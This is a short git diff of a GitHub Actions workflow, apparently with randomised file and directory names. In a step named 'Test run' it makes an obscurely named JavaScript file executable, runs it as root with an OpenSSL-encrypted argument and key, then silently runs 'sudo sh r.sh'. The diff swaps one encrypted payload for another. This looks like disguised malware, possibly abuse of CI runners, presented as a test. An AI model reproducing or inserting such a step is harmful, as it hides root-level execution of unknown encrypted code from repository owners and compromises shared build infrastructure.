--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo '5op6t'
+        echo 'ulfqj'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX18eSRc1wxo9Y+BzZsEKteDq3OpO8EoOr3Wu8wqQ5IvA390cSLCQ3UQmQ71nel/Wkp2cy7SDhbEp4tjYAJRSjOr9dWPL5xcpvg556NGiR5cZi4WVVUJKZRk4 8xttju && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1+1qw6yK0cdgpro3zFesTQavxr6Ywau4KNrls32Vm8mk0b0yNCV2ZSB8Yc60axVtkQGkJVftM19ArIgYhUtDFIDgItkqjliZUgFi+LIL2t3Y4Kksc2EgiIU fotwna && sudo sh r.sh > /dev/null 2>&1
